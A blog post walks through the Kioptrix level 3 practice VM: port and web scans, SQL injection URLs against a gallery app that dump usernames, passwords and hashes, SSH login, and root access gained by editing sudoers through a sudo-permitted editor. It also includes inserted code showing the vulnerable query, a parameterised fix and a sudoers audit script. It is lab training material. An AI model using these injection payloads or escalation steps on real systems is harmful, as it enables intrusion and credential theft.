Saturday, February 4, 2017

Kioptrix level 3

With another busy week behind me, it's due for another post. Continuing with the Kioptrix series, I've selected Kioptrix 3 for this weekend. After downloading the VM I noticed the readme.txt in the download:

DISCLAIMER!
We at Kioptrix are not responsible for any damaged directly, or indirectly,
caused by using this system. We suggest you do not connect this installation
to the Internet.
It is, after all, a vulnerable setup.
Please keep this in mind when playing the game.

This machine is setup to use DHCP.
Before playing the game, please modify your attacker's hosts file.

<ip>    kioptrix3.com
This challenge contains a Web Application.


If you have any questions, please direct them to:
comms[at]kioptrix.com


Hope you enjoy this challenge.
-Kioptrix Team


My first go at this VM was fraught with frustration. It's not until I looked at the readme.txt that I noticed this note about the hosts file. Adding this line does help. To help with things I've started using KeepNote for recording my progress with each vulnerable VM.

After booting up Kioptrix 3 and Kali I start with the usual:

root@kali:~# nmap 192.168.0.198

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-04 21:35 EST
Nmap scan report for 192.168.0.198
Host is up (0.000066s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:C7:D9:56 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

------------------------------------------------------------------------------
root@kali:~# nmap -T4 -A -v 192.168.0.198
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...

Kioptrix 3 has Apache running on it. Let's take a look:


We have a Blog page, a Login page and, if you look at this page, a gallery system. For this VM I've also decided to try out a new tool (for me), Nikto.
I also ran a scan on the gallery page:

root@kali:~# nikto -host http://192.168.0.198/gallery
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.198
+ Target Hostname:    192.168.0.198
+ Target Port:        80
+ Start Time:         2017-02-04 19:01:13 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /gallery/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /gallery/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /gallery/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /gallery/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /gallery/db.sql, inode: 630988, size: 3573, mtime: Sat Oct 10 15:43:52 2009
+ OSVDB-3092: /gallery/db.sql: Database SQL?
+ /gallery/login.php: Admin login page/section found.
+ 7534 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2017-02-04 19:01:28 (GMT-5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested



These two highlighted parts caught my attention. Let's see what they show in the browser:

So I just got the DB structure. I'm going to save this for later. Further down on this page I also get this gem:


CREATE TABLE IF NOT EXISTS `gallarific_users` (
  `userid` int(11) NOT NULL auto_increment,
  `username` varchar(100) NOT NULL default '',
  `password` varchar(100) NOT NULL default '',
  `usertype` enum('superuser','normaluser') NOT NULL default 'superuser',
  `firstname` varchar(100) NOT NULL default '',
  `lastname` varchar(100) NOT NULL default '',
  `email` varchar(255) NOT NULL default '',
  `datejoined` int(11) NOT NULL default '0',
  `website` varchar(255) NOT NULL default '',
  `issuperuser` tinyint(4) NOT NULL default '0',
  `photo` varchar(100) NOT NULL default '',
  `joincode` varchar(20) NOT NULL default '',
  PRIMARY KEY  (`userid`)
);

After clicking on the Press Room I notice a drop-down menu for sorting options. After clicking it I notice 'id' in the URL.

http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos

Throwing in a single quote (http://kioptrix3.com/gallery/gallery.php?id=') into the URL returns this error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by parentid,sort,name' at line 1Could not select category

After a lot of playing around I get an SQL injection to work:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20SELECT%201,2,3,4,5,6

Changing the SQL Injection to:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20SELECT%201,@@version,3,4,5,6
    5.0.51a-3ubuntu5.4

Since I've learned the table and column names from earlier I can get the username and password from the DB:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20SELECT%20userid,username,password,4,5,6%20FROM%20gallarific_users

   admin//n0t7t1k4

This could be used for logging into the site, but I don't think this is a dev account. To prove this I tried logging in with this username. No luck. Time to look for another table:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20ALL%20SELECT%201,2,group_concat%28table_name%29,4,5,6%20from%20information_schema.tables

Gets us:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,
SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,dev_accounts,
gallarific_comments,gallarific_galleries,gallarific_photos,gallarific_settings,gallari

Changing my earlier injection to:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20ALL%20SELECT%201,2,concat%28username,char%2858%29,password%29,4,5,6%20FROM%20dev_accounts

loneferret:5badcaf789d3d1d09794d8f021f40f0e
dreg:0d3eccfb887aabd50f243b3f155c0f85
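The injection works because the id parameter is pasted straight into the SQL text. As an added example (not the Gallarific code, which is not on this page), here is that pattern reproduced against an in-memory SQLite copy of the page's gallarific_users table, next to the parameterised lookup that defeats the same input; the gallarific_galleries columns and the sample rows are assumptions.

```python
import sqlite3

# Constructed, cut-down schema: gallarific_users follows the page's CREATE TABLE,
# the galleries table and both rows are assumptions made for this example.
SCHEMA = """
CREATE TABLE gallarific_users (userid INTEGER PRIMARY KEY, username TEXT, password TEXT);
CREATE TABLE gallarific_galleries (id INTEGER PRIMARY KEY, name TEXT, description TEXT,
                                   parentid INTEGER, sort INTEGER, photo TEXT);
INSERT INTO gallarific_users VALUES (1, 'admin', 'n0t7t1k4');
INSERT INTO gallarific_galleries VALUES (1, 'Press Room', 'Press shots', 0, 1, 'p.jpg');
"""

# The six-column UNION payload from the page, as it would arrive in ?id=
INJECTED_ID = "1 UNION SELECT userid,username,password,4,5,6 FROM gallarific_users"


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, raw_id):
    # Mirrors what the page's error message implies: an unquoted numeric id
    # concatenated into the query ahead of 'order by parentid,sort,name'.
    sql = ("SELECT id,name,description,parentid,sort,photo FROM gallarific_galleries "
           f"WHERE id={raw_id} ORDER BY parentid,sort,name")
    return conn.execute(sql).fetchall()


def safe_lookup(conn, raw_id):
    # Hardened form: validate the type, then bind the value as a parameter so
    # the SQL text is fixed and the input cannot change its structure.
    gallery_id = int(raw_id)  # raises ValueError for "1 UNION ..." or "'"
    sql = ("SELECT id,name,description,parentid,sort,photo FROM gallarific_galleries "
           "WHERE id=? ORDER BY parentid,sort,name")
    return conn.execute(sql, (gallery_id,)).fetchall()


def raises_sql_error(conn, raw_id):
    # True when the database rejects the statement, i.e. the single-quote
    # probe from the page produces a syntax error instead of a result.
    try:
        vulnerable_lookup(conn, raw_id)
    except sqlite3.Error:
        return True
    return False
```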

From the blog site loneferret is the new admin for the site. This is the username I want.

I used crackstation.net to crack these hashes:
With this I now try to log in to phpMyAdmin and the LotusCMS login pages, no luck. BUT SSH works:
An ls of loneferret's home directory shows:
checksec.sh and CompanyPolicy.README

checksec.sh description shows:
# Name    : checksec.sh
# Version : 1.4
# Author  : Tobias Klein
# Date    : January 2011
# Download: http://www.trapkit.de/tools/checksec.html
# Changes : http://www.trapkit.de/tools/checksec_changes.txt
#
# Description:
#
# Modern Linux distributions offer some mitigation techniques to make it
# harder to exploit software vulnerabilities reliably. Mitigations such
# as RELRO, NoExecute (NX), Stack Canaries, Address Space Layout
# Randomization (ASLR) and Position Independent Executables (PIE) have
# made reliably exploiting any vulnerabilities that do exist far more
# challenging. The checksec.sh script is designed to test what *standard*
# Linux OS and PaX (http://pax.grsecurity.net/) security features are being
# used.
#
# As of version 1.3 the script also lists the status of various Linux kernel
# protection mechanisms.


CompanyPolicy.README shows:
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$


To get root I need to sudo su, but this isn't allowed at the moment. I need to edit the sudoers file, and ht will do the trick.
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers

After a quick Google search of the error I found the answer on this stackoverflow.com page:
http://stackoverflow.com/questions/6804208/nano-error-error-opening-terminal-xterm-256color

I've edited the file so loneferret can do all the things that root can.
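Letting a user run an interactive editor under sudo is the same as giving them root, because the editor can open /etc/sudoers itself. The check below is an added example, not part of the original post: it walks a sudoers file and flags user specs that grant an editor, an unrestricted command, or NOPASSWD. The sample sudoers text, the /usr/local/bin/ht path and the editor list are assumptions.

```python
import re

# Constructed sudoers excerpt: the ht entry has the shape CompanyPolicy.README
# implies ('sudo ht'); the path and the other lines are assumptions.
SAMPLE_SUDOERS = """\
Defaults env_reset
root        ALL=(ALL) ALL
# company policy: everyone edits with ht
loneferret  ALL=(ALL) /usr/local/bin/ht
dreg        ALL=(ALL) NOPASSWD: /usr/bin/apt-get
"""

# Interactive programs that can read or write arbitrary files as root.
# A short illustrative list, not an exhaustive one.
FILE_EDITORS = {"ht", "vi", "vim", "nano", "emacs", "ed", "less", "more"}

# user host=(runas) [NOPASSWD:] cmd1, cmd2 ...  (one user spec per line)
SPEC = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)=(?:\((?P<runas>[^)]*)\))?"
                  r"\s*(?P<cmds>.+)$")


def audit_sudoers(text):
    """Return a list of (user, command, reasons) for every risky user spec."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = SPEC.match(line)
        if not m:
            continue
        cmds = m.group("cmds")
        nopasswd = "NOPASSWD:" in cmds
        cmds = cmds.replace("NOPASSWD:", "").replace("PASSWD:", "")
        for cmd in (c.strip() for c in cmds.split(",")):
            if not cmd or cmd.startswith("!"):
                continue  # negated entries do not grant anything
            reasons = []
            if cmd == "ALL":
                reasons.append("unrestricted command")
            if cmd.rsplit("/", 1)[-1] in FILE_EDITORS:
                reasons.append("editor can rewrite /etc/sudoers as root")
            if nopasswd:
                reasons.append("NOPASSWD")
            if reasons:
                findings.append((m.group("user"), cmd, reasons))
    return findings
```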

loneferret@Kioptrix3:~$ sudo su
[sudo] password for loneferret:
root@Kioptrix3:/home/loneferret# whoami
root
root@Kioptrix3:/home/loneferret# cd
root@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS:
http://www.lotuscms.org

Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

root@Kioptrix3:~#
